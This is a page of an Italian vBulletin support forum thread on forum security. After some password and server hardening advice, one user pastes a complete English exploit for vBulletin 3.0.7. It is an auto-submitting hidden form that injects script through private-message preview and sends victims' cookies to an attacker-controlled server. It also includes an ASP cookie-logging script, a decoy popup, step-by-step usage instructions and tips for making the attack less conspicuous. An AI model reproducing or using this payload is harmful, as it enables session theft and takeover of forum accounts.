Pagina 2 di 3 PrimaPrima 123 UltimaUltima
Risultati da 11 a 20 di 22

Discussione: Vulnerabilità vBulletin

  1. #11
    Borg L'avatar di y2ksw
    Data Registrazione
    Nov 2004
    Località
    Bologna, Italia
    Età
    64
    Messaggi
    9,035
    Per poter "rovinare" il forum, influiscono i seguenti fattori:
    • Accesso FTP: verificare che username e password sono difficili da indovinare, la password composta possibilmente da almeno 8 caratteri più o meno casuali, maiuscole e minuscole miste assieme ai numerici (x2lm3vgc sarebbe una buona password, ad esempio). Se un hacker riesce a prendere in possesso il sito tramite FTP, può cancellare gli script e gli allegati, avatar ecc, ma non può modificare il database, a meno che questo non sia accessibile tramite FTP (spero di no!!!).
    • Accesso MySQL: vale la stessa cosa per le password come per FTP. Se un hacker può fare il login al database, può distruggere tutto, tranne gli script e gli allegati.
    • Accesso a vBulletin: idem per la password. Può distruggere tutto tranne gli script.
    In tutti i casi, è assolutamente essenziale che tutte e tre le password siano diverse.

    Per quanto riguarda il server, è necessario che sia ben protetto e che abbia i filtri principali contro troian e vari attacchi installati. Esistono siti esterni, che permettono di simulare un attacco, e rivelano tutte le possibili falle del proprio sistema. Con l'aiuto di questi siti si riesce a 'tappare' ogni buco e risolvere la maggioranza dei problemi alla radice.
    Giovanni
    http://www.trimelli.com/

    Per favore non mandatemi PM, ma scrivete sul forum. Vi sarà risposto prima.

  2. #12
    Account disattivato L'avatar di FrankFitness
    Data Registrazione
    Nov 2004
    Messaggi
    11
    Ragazzi, la parolina LAMER vi dice qualcosina?

  3. #13
    Inattivo
    Data Registrazione
    Jan 2005
    Località
    Vicopisano [PI]
    Età
    47
    Messaggi
    46
    Citazione Originariamente Scritto da y2ksw
    Esistono siti esterni, che permettono di simulare un attacco, e rivelano tutte le possibili falle del proprio sistema. Con l'aiuto di questi siti si riesce a 'tappare' ogni buco e risolvere la maggioranza dei problemi alla radice.
    Non sarebbe male stilare un bell'elenco dei siti di "Tiger team", cosi se qualcuno ne avrà mai bisogno......

  4. #14
    sicuri che non è possibile bucarlo?? con la versione 3.0.7 esiste un exploit... non posso postarlo in quanto questo non è un sito hacker.... però il sistema ci sta e proprio tramite vbulletin, senza passare ne dall'hoster, ne da ftp ne usando accessi da admin (quelli li prendi con l'exploit)....

  5. #15
    vBulletin Lover L'avatar di mossss
    Data Registrazione
    Dec 2004
    Località
    Google Campus
    Età
    43
    Messaggi
    742
    Citazione Originariamente Scritto da King
    Non sarebbe male stilare un bell'elenco dei siti di "Tiger team", cosi se qualcuno ne avrà mai bisogno......
    interessante... perchè vorrei proprio provare sul mio

    Citazione Originariamente Scritto da hokar
    sicuri che non è possibile bucarlo?? con la versione 3.0.7 esiste un exploit... non posso postarlo in quanto questo non è un sito hacker.... però il sistema ci sta e proprio tramite vbulletin, senza passare ne dall'hoster, ne da ftp ne usando accessi da admin (quelli li prendi con l'exploit)....
    dacci almeno maggiori dettagli, detto così ho capito poco...
    mossss

    OnlyFocus.com
    Discussioni: 9,236, Messaggi: 493,085, Utenti: 2,011
    powered by vBulletin 3.6.0 + vBadvanced CMPS 2.2 + Coppermine Gallery v1.4.8
    Vi prego di NON mandare email/PM per chiedere supporto, usate il forum!!!

  6. #16
    vorrei darvi più dettagli, ma l'unico modo che lo possiate capire, è che vi posto l'exploit direttamente!! Si passa tramite XSS.... mi spiace che non posso esserve di aiuto ma non lo conosco come exploit... sò che esiste, sò dove prenderlo, ma non ci capisco nulla :-|

  7. #17
    vBulletin Lover L'avatar di mossss
    Data Registrazione
    Dec 2004
    Località
    Google Campus
    Età
    43
    Messaggi
    742
    Citazione Originariamente Scritto da hokar
    vorrei darvi più dettagli, ma l'unico modo che lo possiate capire, è che vi posto l'exploit direttamente!! Si passa tramite XSS.... mi spiace che non posso esserve di aiuto ma non lo conosco come exploit... sò che esiste, sò dove prenderlo, ma non ci capisco nulla :-|

    mha...
    mossss

    OnlyFocus.com
    Discussioni: 9,236, Messaggi: 493,085, Utenti: 2,011
    powered by vBulletin 3.6.0 + vBadvanced CMPS 2.2 + Coppermine Gallery v1.4.8
    Vi prego di NON mandare email/PM per chiedere supporto, usate il forum!!!

  8. #18
    Borg L'avatar di y2ksw
    Data Registrazione
    Nov 2004
    Località
    Bologna, Italia
    Età
    64
    Messaggi
    9,035
    Ho la vaga idea che si tratta di un exploit umano: chi ci crede?

    Non ci possono essere delle cose gravissime che si possono fare con questo exploit, altrimenti avremmo sentito le campane da mille parti. Sicuramente è applicabile soltanto in casi eccezionali, con una lunga catena di "se", tipo: se il sistema operativo non è aggiornato, e se l'impostazione del forum è fatta in tal modo, e se ... allora si può entrare.

    Certo, togliendo tutte le protezioni chiunque può fare quel che gli pare.
    Giovanni
    http://www.trimelli.com/

    Per favore non mandatemi PM, ma scrivete sul forum. Vi sarà risposto prima.

  9. #19
    io ve lo posto, poi se lo volete levare lo levate... okey??

  10. #20
    è in inglese per cui... dovrete tradurre tutto voi.. come vi ho detto nn capisco na mazza, ma l'ho preso da un sito dove hanno solo exploit...

    first off lets look at the code involved:

    Codice:
      <html>
          <head>
             <title>  </title>
          </head>
          <script language = "JavaScript">
             function autosubmit()
                    {
                      document.vbform.submit();
                      self.close;
                    }
             function settime()
                    {
                      window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat
    ion=yes,scrollbars=yes");
                      setTimeout("autosubmit()", 0.25);
                    }
          </script>
          <body onLoad="settime()">
    <script type="text/javascript">
    <!--
    function checkpm(formname)
    {
    var result = validatePost(formname, formname.title.value, 0, 5000);
    
    if (result == false)
    {
     formname.dopreview = false;
     return result;
    }
    else if (formname.dopreview != true)
    {
    
     if (confirm("Request a read receipt for this message?"))
     {
      formname.receipt.value = 1;
     }
    
    }
    
    return result;
    }
    //-->
    </script>
             <form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)">
    <input type ="hidden" name="preview" value="Preview+Message" />
    <input type="hidden" name="recipients" value="" />
    <input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" />
    <input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" />
    <input type="hidden" name="s" value="" />
     <input type="hidden" name="do" value="insertpm" />
     <input type="hidden" name="pmid" value="" />
     <input type="hidden" name="forward" value="" />
     <input type="hidden" name="receipt" value="0" />
    <input type="hidden" class="hidden" name="sbutton" value="Submit Message" accesskey="s" tabindex="1" />
     <input type="hidden" class="button" value="Preview Message" accesskey="p" name="preview" tabindex="1" onclick="this.form.dopreview = true; return true;" />
    </form>
          </body>
       </html>
    now im not very good with java script so i dont know how much of that code is needed but i DO know that this works.

    we all know the XSS ability in PREVIEWING a PM so i made a hidden form which auto submits and posts the same data as the exploit.

    ok so here is how to use:

    change the names in the code to point to your domain. at the top you will see:

    Codice:
    window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat
    ion=yes,scrollbars=yes");
    this is because i wanted a window to appear which blocks what the user sees in the background, so i would say something like "check out my site" or something to that effect...

    this isnt neccesary as all the XSS is done hidden.

    here are some other things you have to change:

    Codice:
     <form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)">
    the name of the form is usually vbform i doubt the admin would have changed it but if it doesnt work then change it.

    Codice:
    <input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" />
    this is the title... 192.168.1.2 in my case was my server PC... change this to your webpage which will log the cookie info...

    Codice:
    <input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" />
    this is the msg in the previewed PM... this doesnt matter what it says as it isnt seen by the user because after the cookie is logged they are redirected straight away. BUT IT MUST CONTAIN SOMETHING OR THE HACK WONT WORK!! (i dont think it will anyway lol best be on the safe side)

    Codice:
    <input type="hidden" name="receipt" value="0" />
    If you want a read reciept (maybe to make sure the person has read it) then set this to "1".

    because i HAVENT been able to spoof the header you will have to put the file in a document repository or something to FORCE the download box to appear. because when the browser opens the new window there is no previous URL hence no referer hence no validation check smile.gif

    now on my SERVER i used ASP:

    Codice:
    index.asp:
    
    <%@LANGUAGE="VBSCRIPT" CODEPAGE="1252"%>
    <%
    dim conn, rs, getstring, SQLStmt, cStr, DBQ
    getstring = request.QueryString("ac")
    if len("getstring") > 1 then
    set conn= server.CreateObject("ADODB.Connection")
    set rs = server.CreateObject("ADODB.Recordset")
    conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/db/poster.mdb"))
    SQLStmt = "SELECT * FROM cookie"
    RS.Open SQLStmt, Conn, 3, 3
    rs.AddNew
    rs("cookie") = getstring
    rs.update
    rs.close
    end if
    set conn=nothing
    set rs=nothing
    %>
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>Cross Site Script!! WOOOOOT!</title>
    </head>
    
    <body>
    <%
    set conn = server.CreateObject("ADODB.Connection")
    conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/mafiastylegangs/db/poster.mdb"))
    set rs = server.createobject("ADODB.recordset")
    sql = "Select * from cookie"
    RS.Open sql, Conn, 3, 3
    do until rs.eof
    %>
    <b><%=rs("cookie")%></b><br><BR>
    <%
    rs.movenext
    loop
    rs.close
    dim admin
    admin =request.querystring("admin")
    if not admin="yes" then response.redirect("http://www.naasalansar.com")
    %>
    
    </body>
    </html>
    here is what it does:

    it has a simple protection feature if the querystring admin = yes then i can view the cookies rather than having it log it...

    but if its empty then the cookie will be logged to the database and redirected to your final site...

    so if i say "check out this article:"

    then your final redirect should look like:

    Codice:
    if not admin="yes" then response.redirect("http://www.timesonline.com/blahblahblah.html")

    thats all for now... there is only so much detail one man can take lol

    btw you might want to modify this line to something less conspicuous:

    Codice:
    <title>Cross Site Script!! WOOOOOT!</title>
    some improvements that can be made:

    spoof the header to the domain of ure victim forum so the person doenst have to download the file but just click on a link instead.

    thats all i can think off cheers
    ------------------------------------------------------------------------------------

    End of exploit

    by: barodate
    thanks to every1 at h4cky0u!!!!

    i know its rather long but maybe some of the l337 coders here can make it a perl script or something...

    enjoy




    Ecco a voi, quello è tutto l'eploit...

Pagina 2 di 3 PrimaPrima 123 UltimaUltima

Tag per Questa Discussione

Segnalibri

Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •